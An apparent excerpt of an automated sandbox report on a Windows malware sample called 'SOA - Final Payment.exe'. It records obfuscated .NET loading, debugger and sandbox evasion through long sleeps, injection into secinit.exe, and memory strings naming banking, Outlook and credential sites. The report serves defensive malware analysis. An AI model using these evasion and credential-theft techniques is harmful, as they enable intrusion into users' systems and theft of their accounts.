                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\secinit.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: SOA - Final Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SOA - Final Payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SOA - Final Payment.exe, SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655110436.000000000050F000.00000002.00000001.01000000.0000000C.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2602458312.000000000050F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                Source: 0.2.SOA - Final Payment.exe.450a528.1.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.cs.Net Code: IfcMEmfppD System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.cs.Net Code: IfcMEmfppD System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.cs.Net Code: IfcMEmfppD System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.44ea508.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0184E958 pushfd ; retf 0_2_0184E959
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_059CD7A0 push eax; mov dword ptr [esp], ecx 0_2_059CD7B4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_059CDEA1 push eax; ret 0_2_059CDEB3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792BA10 push cs; ret 0_2_0792BA11
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_07B319D5 push FFFFFF8Bh; iretd 0_2_07B319D7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7845E0 push eax; ret 0_2_0B7845E1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0041F003 pushfd ; iretd 5_2_0041F01B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00414086 push esi; ret 5_2_00414095
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00417939 push FFFFFFD7h; retf 5_2_0041793E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040DA26 push es; iretd 5_2_0040DA2E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00418AD8 pushad ; iretd 5_2_00418ADF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0041940F push edx; ret 5_2_00419411
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00419416 push edi; retf 5_2_00419417
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004075C0 push esi; retf 5_2_004075C8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040AD9E push ebp; retf 5_2_0040AD9F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040D5AD push 43AEBFE9h; ret 5_2_0040D5B9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00418654 push ds; ret 5_2_00418656
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00403660 push eax; ret 5_2_00403662
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00401669 push eax; retf 5_2_0040166A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040760B push ebx; iretd 5_2_0040760D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0041D612 pushfd ; ret 5_2_0041D620
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00414EC6 push esp; ret 5_2_00414EC7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00401FEE pushad ; retf 5_2_00401FEF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012709AD push ecx; mov dword ptr [esp], ecx 5_2_012709B6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033909AD push ecx; mov dword ptr [esp], ecx 10_2_033909B6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A642D6 push FFFFFFD7h; retf 10_2_02A642DB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A60A23 push esi; ret 10_2_02A60A32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A64FF1 push ds; ret 10_2_02A64FF3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A713C2 push cs; ret 10_2_02A713D9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A61779 push esi; retf 10_2_02A61771
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A61749 push esi; retf 10_2_02A61771
                Source: SOA - Final Payment.exeStatic PE information: section name: .text entropy: 7.772646253601764
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, OoBZYlURZFhiWNTeye.csHigh entropy of concatenated method names: 'x6e7mhLKmw', 'PM97DigSad', 'Nxr71M3haK', 'Evx7C1DD22', 'wFq7KpOxnR', 'dNe7ReN3Xv', 'NVv7866jXg', 'iSm7xh4tKW', 'nuw7rw6Hno', 'FGX7anFP5e'
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: SOA - Final Payment.exe PID: 7296, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 17F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 34C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 1A70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 91A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: A1A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: A390000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: B390000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: BED0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: CED0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: DED0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED1C0 rdtsc 5_2_012ED1C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 2454
                Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 7518
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\secinit.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe TID: 7300Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe TID: 7316Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep count: 2454 > 30
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep time: -4908000s >= -30000s
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep count: 7518 > 30
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep time: -15036000s >= -30000s
                Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A6C750 FindFirstFileW,FindNextFileW,FindClose,10_2_02A6C750
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeThread delayed: delay time: 30000
                Source: 472E1186.10.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 472E1186.10.drBinary or memory string: global block list test formVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 472E1186.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 472E1186.10.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: 472E1186.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 472E1186.10.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 472E1186.10.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: firefox.exe, 0000000E.00000002.2047067119.000002B8859AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 472E1186.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 472E1186.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 472E1186.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2604309160.0000000000A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 472E1186.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 472E1186.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 472E1186.10.drBinary or memory string: discord.comVMware20,11696497155f
                Source: 472E1186.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 472E1186.10.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 472E1186.10.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: 472E1186.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 472E1186.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 472E1186.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\secinit.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00417CF3 LdrLoadDll,5_2_00417CF3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A0124 mov eax, dword ptr fs:[00000030h]5_2_012A0124
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B136 mov eax, dword ptr fs:[00000030h]5_2_0126B136
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271131 mov eax, dword ptr fs:[00000030h]5_2_01271131
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01330115 mov eax, dword ptr fs:[00000030h]5_2_01330115
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A118 mov ecx, dword ptr fs:[00000030h]5_2_0131A118
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A118 mov eax, dword ptr fs:[00000030h]5_2_0131A118
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01309179 mov eax, dword ptr fs:[00000030h]5_2_01309179
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345152 mov eax, dword ptr fs:[00000030h]5_2_01345152
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01308158 mov eax, dword ptr fs:[00000030h]5_2_01308158
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269148 mov eax, dword ptr fs:[00000030h]5_2_01269148
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C156 mov eax, dword ptr fs:[00000030h]5_2_0126C156
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01276154 mov eax, dword ptr fs:[00000030h]5_2_01276154
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01304144 mov eax, dword ptr fs:[00000030h]5_2_01304144
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01304144 mov ecx, dword ptr fs:[00000030h]5_2_01304144
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277152 mov eax, dword ptr fs:[00000030h]5_2_01277152
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013211A4 mov eax, dword ptr fs:[00000030h]5_2_013211A4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128B1B0 mov eax, dword ptr fs:[00000030h]5_2_0128B1B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B0185 mov eax, dword ptr fs:[00000030h]5_2_012B0185
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F019F mov eax, dword ptr fs:[00000030h]5_2_012F019F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A197 mov eax, dword ptr fs:[00000030h]5_2_0126A197
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132C188 mov eax, dword ptr fs:[00000030h]5_2_0132C188
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C7190 mov eax, dword ptr fs:[00000030h]5_2_012C7190
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013171F9 mov esi, dword ptr fs:[00000030h]5_2_013171F9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012751ED mov eax, dword ptr fs:[00000030h]5_2_012751ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013461E5 mov eax, dword ptr fs:[00000030h]5_2_013461E5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A01F8 mov eax, dword ptr fs:[00000030h]5_2_012A01F8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013361C3 mov eax, dword ptr fs:[00000030h]5_2_013361C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AD1D0 mov eax, dword ptr fs:[00000030h]5_2_012AD1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AD1D0 mov ecx, dword ptr fs:[00000030h]5_2_012AD1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012EE1D0 mov eax, dword ptr fs:[00000030h]5_2_012EE1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012EE1D0 mov ecx, dword ptr fs:[00000030h]5_2_012EE1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013451CB mov eax, dword ptr fs:[00000030h]5_2_013451CB
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A020 mov eax, dword ptr fs:[00000030h]5_2_0126A020
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C020 mov eax, dword ptr fs:[00000030h]5_2_0126C020
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133903E mov eax, dword ptr fs:[00000030h]5_2_0133903E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F4000 mov ecx, dword ptr fs:[00000030h]5_2_012F4000
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E016 mov eax, dword ptr fs:[00000030h]5_2_0128E016
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F106E mov eax, dword ptr fs:[00000030h]5_2_012F106E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345060 mov eax, dword ptr fs:[00000030h]5_2_01345060
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov ecx, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129C073 mov eax, dword ptr fs:[00000030h]5_2_0129C073
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED070 mov ecx, dword ptr fs:[00000030h]5_2_012ED070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131705E mov ebx, dword ptr fs:[00000030h]5_2_0131705E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131705E mov eax, dword ptr fs:[00000030h]5_2_0131705E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01272050 mov eax, dword ptr fs:[00000030h]5_2_01272050
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B052 mov eax, dword ptr fs:[00000030h]5_2_0129B052
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6050 mov eax, dword ptr fs:[00000030h]5_2_012F6050
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013360B8 mov eax, dword ptr fs:[00000030h]5_2_013360B8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013360B8 mov ecx, dword ptr fs:[00000030h]5_2_013360B8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013080A8 mov eax, dword ptr fs:[00000030h]5_2_013080A8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D08D mov eax, dword ptr fs:[00000030h]5_2_0126D08D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127208A mov eax, dword ptr fs:[00000030h]5_2_0127208A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FD080 mov eax, dword ptr fs:[00000030h]5_2_012FD080
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FD080 mov eax, dword ptr fs:[00000030h]5_2_012FD080
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01275096 mov eax, dword ptr fs:[00000030h]5_2_01275096
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A909C mov eax, dword ptr fs:[00000030h]5_2_012A909C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129D090 mov eax, dword ptr fs:[00000030h]5_2_0129D090
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129D090 mov eax, dword ptr fs:[00000030h]5_2_0129D090
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0126A0E3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012950E4 mov eax, dword ptr fs:[00000030h]5_2_012950E4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012950E4 mov ecx, dword ptr fs:[00000030h]5_2_012950E4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012780E9 mov eax, dword ptr fs:[00000030h]5_2_012780E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F60E0 mov eax, dword ptr fs:[00000030h]5_2_012F60E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C0F0 mov eax, dword ptr fs:[00000030h]5_2_0126C0F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B20F0 mov ecx, dword ptr fs:[00000030h]5_2_012B20F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
